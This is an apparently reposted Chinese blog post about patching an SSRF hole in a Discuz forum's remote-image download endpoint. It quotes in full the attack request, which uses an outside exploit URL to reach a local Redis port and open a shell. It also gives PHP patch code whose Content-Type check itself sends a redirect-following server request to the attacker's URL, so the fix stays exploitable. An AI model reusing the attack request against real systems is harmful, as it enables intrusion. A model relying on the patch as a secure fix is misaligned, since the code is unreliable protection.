SSRF導致命令執行可反彈Shell漏洞解決辦法

來源:互聯網
上載者:User

迅雷官方論壇(discuz)被烏雲平台檢測出一個SSRF漏洞,攻擊者通過SSRF成功反彈shell,漏洞存在於一個遠程圖片下載的介面,沒有對url進行有效合法性檢測。今天臨時解決了這個漏洞,記錄一下修複方法。

漏洞還沒有公開,現在是憑密碼才能訪問。

這個存在漏洞的url地址是/forum.php?mod=ajax&action=downremoteimg&message=

攻擊者請求這個地址即可進行SSRF攻擊:

/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=6379%26data=helo.jpg[/img]

這裡message包含使用者在論壇發布的圖片地址,正常情況下是圖片格式尾碼,雖然對尾碼進行了判斷,但是判斷不嚴格,這個地址可以傳任意的指令碼。

解決辦法是在介面增加合法性判斷,判斷url真實的尾碼是否合法,即使合法,也可能通過url rewrite方式偽造,更嚴格的判斷通過curl請求擷取頭資訊,根據返回的報文頭判斷Content-Type是否合法。

於是,在檔案/source/module/forum/forum_ajax.php檔案新增以下幾個函數:

PHP

//擷取上傳圖片url列表
function getImageList($temp)
{
    $urlList = array();
    foreach ($temp as $item) {
        $urlList[] = $item[1];
    }
    return $urlList;
}

/**
 * 檢查content-type是否合法
 * @param $imageList array 圖片url列表
 * @return bool true合法 false非法
 */
function checkContentType($imageList)
{
    $allowExtensions = array('jpg', 'jpeg', 'png', 'gif', 'bmp');
    $allowTypes = array('image/png', 'image/x-png', 'image/gif', 'image/jpeg', 'image/pjpeg');
    foreach ($imageList as $url) {
        $extension = getUrlExtension($url);
        if(!in_array(strtolower($extension), $allowExtensions)){
            return false;
        }
        $contentType = getContentType($url);
        if (!in_array($contentType, $allowTypes)) {
            return false;
        }
    }
    return true;
}

//擷取content-type
function getContentType($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_NOBODY, 1);
    curl_exec($ch);
    $contentType = curl_getinfo($ch, CURLINFO_CONTENT_TYPE);
    return $contentType;
}

//擷取url尾碼
function getUrlExtension($url)
{
    $parseurl = parse_url($url);
    $extension = pathinfo($parseurl['path'], PATHINFO_EXTENSION);
    return $extension;
}

在具體介面處理的地方新增:

PHP

elseif($_GET['action'] == 'downremoteimg') {
 $_GET['message'] = str_replace(array("\r", "\n"), array($_GET['wysiwyg'] ? '<br />' : '', "\\n"), $_GET['message']);
 preg_match_all("/\[img\]\s*([^\[\<\r\n]+?)\s*\[\/img\]|\[img=\d{1,4}[x|\,]\d{1,4}\]\s*([^\[\<\r\n]+?)\s*\[\/img\]/is", $_GET['message'], $image1, PREG_SET_ORDER);
 preg_match_all("/\<img.+src=('|\"|)?(.*)(\\1)([\s].*)?\>/ismUe", $_GET['message'], $image2, PREG_SET_ORDER);
 $temp = $aids = $existentimg = array();
 if(is_array($image1) && !empty($image1)) {
  foreach($image1 as $value) {
   $temp[] = array(
    '0' => $value[0],
    '1' => trim(!empty($value[1]) ? $value[1] : $value[2])
   );
  }
 }
 if(is_array($image2) && !empty($image2)) {
  foreach($image2 as $value) {
   $temp[] = array(
    '0' => $value[0],
    '1' => trim($value[2])
   );
  }
 }

 //檢測圖片是否合法 Added by tanteng<tanteng@xunlei.com> 2016.07.07
        if(is_array($temp) && !empty($temp)){
            $imageList = getImageList($temp);
            $check = checkContentType($imageList);
            if ($check === false) {
                die('file upload error!');
            }
}

首先判斷url尾碼是否合法,再通過curl請求判斷header的Content-Type是否合法,因為後者不容易偽造。其中curl判斷檔案Content-Type方法:

PHP

//擷取content-type
function getContentType($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_NOBODY, 1);
    curl_exec($ch);
    $contentType = curl_getinfo($ch, CURLINFO_CONTENT_TYPE);
    return $contentType;
}

再訪問烏雲公開的漏洞地址,直接中止程式。

不過,這樣做有一個問題,有的圖片地址並不是真實的靜態檔案,如:http://image.demo.com/avatar/100/150*150,這個路徑就是一個圖片,儘管不是圖片格式的靜態路徑,那麼這樣判斷就會誤判,不過這種情況是很少數,暫且不管。

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.